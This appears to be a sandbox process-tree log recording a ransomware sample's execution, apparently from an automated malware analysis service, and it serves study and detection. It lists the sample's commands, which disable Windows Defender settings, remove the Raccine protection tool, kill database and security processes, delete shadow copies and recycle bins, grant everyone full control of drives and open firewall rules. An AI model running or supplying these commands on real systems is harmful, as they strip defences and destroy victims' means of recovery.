                                                                                                                            "icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:1160
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:2624
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4452
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:2260
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:4328
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5256
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5268
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5152
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:5172
                                                                                                                          • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                            "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
                                                                                                                            2⤵
                                                                                                                              PID:1616
                                                                                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                              "icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q
                                                                                                                              2⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:5276
                                                                                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                              "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q
                                                                                                                              2⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:1116
                                                                                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                              "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q
                                                                                                                              2⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:6052
                                                                                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                              "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q
                                                                                                                              2⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:6008
                                                                                                                            • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                              "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q
                                                                                                                              2⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:4476
                                                                                                                          • C:\Windows\PAExec-4532-RJMQBVDN.exe
                                                                                                                            C:\Windows\PAExec-4532-RJMQBVDN.exe -service
                                                                                                                            1⤵
                                                                                                                              PID:4684
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:4624
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
                                                                                                                                    3⤵
                                                                                                                                      PID:4240
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "powershell" Get-MpPreference -verbose
                                                                                                                                      3⤵
                                                                                                                                        PID:4156
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                        3⤵
                                                                                                                                          PID:4036
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                          3⤵
                                                                                                                                            PID:2144
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                            3⤵
                                                                                                                                              PID:4952
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                              3⤵
                                                                                                                                                PID:4572
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                3⤵
                                                                                                                                                  PID:4276
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5072
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4344
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4576
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5104
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4548
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5132
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5352
                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                "taskkill" /F /IM RaccineSettings.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5560
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5716
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  "reg" delete HKCU\Software\Raccine /F
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                  PID:5780
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5852
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    "sc.exe" config Dnscache start= auto
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5912
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      "sc.exe" config FDResPub start= auto
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5960
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5932
                                                                                                                                                                        • C:\Windows\system32\netsh.exe
                                                                                                                                                                          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5920
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6072
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              "sc.exe" config SstpSvc start= disabled
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:6096
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                "sc.exe" config SSDPSRV start= auto
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6064
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  "sc.exe" config SQLWriter start= disabled
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5156
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    "sc.exe" config upnphost start= auto
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:2616
                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                    "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5388
                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                      "taskkill.exe" /IM synctime.exe /F
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4836
                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:5048
                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4652
                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                        "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:5496
                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                        "taskkill.exe" /IM sqbcoreservice.exe /F
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:5592
                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                          "taskkill.exe" /IM Ntrtscan.exe /F
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5648
                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                            "taskkill.exe" /IM onenote.exe /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:5856
                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                            "taskkill.exe" /IM agntsvc.exe /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:5992
                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                            "taskkill.exe" /IM mysqld.exe /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:6092
                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                            "taskkill.exe" /IM firefoxconfig.exe /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:4212
                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                            "taskkill.exe" /IM isqlplussvc.exe /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6136
                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                              "taskkill.exe" /IM thebat.exe /F
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:4172
                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                              "taskkill.exe" /IM PccNTMon.exe /F
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:4436
                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                              "taskkill.exe" /IM steam.exe /F
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:5560
                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                "taskkill.exe" /IM sqlwriter.exe /F
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                PID:496
                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                "taskkill.exe" /IM outlook.exe /F
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5412
                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                  "taskkill.exe" /IM ocomm.exe /F
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:4124
                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                  "taskkill.exe" /IM msaccess.exe /F
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                  PID:5504
                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                  "taskkill.exe" /IM encsvc.exe /F
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:992
                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                    "taskkill.exe" /IM tmlisten.exe /F
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:4824
                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                      "taskkill.exe" /IM tbirdconfig.exe /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      PID:4976
                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                      "taskkill.exe" /IM infopath.exe /F
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4680
                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                        "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5576
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM excel.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4424
                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                            "taskkill.exe" /IM msftesql.exe /F
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                            PID:4668
                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                            "taskkill.exe" /IM dbeng50.exe /F
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4204
                                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                              "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5388
                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                "taskkill.exe" /IM mbamtray.exe /F
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                  "taskkill.exe" /IM visio.exe /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:5012
                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                  "taskkill.exe" /IM CNTAoSMgr.exe /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:6060
                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                    "taskkill.exe" /IM powerpnt.exe /F
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                      "taskkill.exe" /IM thebat64.exe /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:5800
                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                      "taskkill.exe" /IM zoolz.exe /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:4492
                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                      "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:5724
                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                      "taskkill.exe" /IM mysqld-nt.exe /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5756
                                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                        "taskkill.exe" IM thunderbird.exe /F
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5740
                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                          "taskkill.exe" /IM wordpad.exe /F
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:5168
                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                          "taskkill.exe" /IM dbsnmp.exe /F
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:2876
                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                          "taskkill.exe" /IM mysqld-opt.exe /F
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5976
                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                            "taskkill.exe" /IM winword.exe /F
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5992
                                                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                              "taskkill.exe" /IM xfssvccon.exe /F
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              PID:4072
                                                                                                                                                                                                                            • C:\Windows\system32\arp.exe
                                                                                                                                                                                                                              "arp" -a
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM ocautoupds.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:6104
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM ocssd.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:5912
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM oracle.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:4452
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM sqlagent.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:5060
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM sqlbrowser.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:4496
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM sqlservr.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3192
                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                  "taskkill.exe" /IM ragent.exe /f
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:4308
                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                  "taskkill.exe" /IM sqld.exe /f
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:4144
                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                  "taskkill.exe" /IM rmngr.exe /f
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:396
                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                  "taskkill.exe" /IM rphost.exe /f
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4184
                                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                    "taskkill.exe" /IM oracle.exe /f
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                    PID:2164
                                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                    "taskkill.exe" /IM sql.exe /f
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:5300
                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                      "taskkill.exe" /IM mysql.exe /f
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                      PID:4880
                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                      "taskkill.exe" /IM mysqld.exe /f
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:5276
                                                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                        "taskkill.exe" /IM vmwp.exe /f
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5088
                                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                          "taskkill.exe" /IM 1cv8.exe /f
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5332
                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                            "icacls" "C:*" /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:5764
                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                            "icacls" "Z:*" /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:5208
                                                                                                                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                            "icacls" "D:*" /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:5236
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            "cmd.exe" /C C:\Windows\TEMP\tmp292F.bat
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4628
                                                                                                                                                                                                                                              • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                mountvol
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:4036
                                                                                                                                                                                                                                                • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                  find "}\"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:2592
                                                                                                                                                                                                                                                  • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                    mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:6052
                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                      ping -n 2 127.0.0.1
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                      PID:6040
                                                                                                                                                                                                                                                    • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:3576
                                                                                                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                        ping -n 2 127.0.0.1
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:4176
                                                                                                                                                                                                                                                      • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                        mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:4980
                                                                                                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                          ping -n 2 127.0.0.1
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                          PID:4500
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5484
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          "cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4244
                                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                                            "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                                                                                                                                                                            3⤵
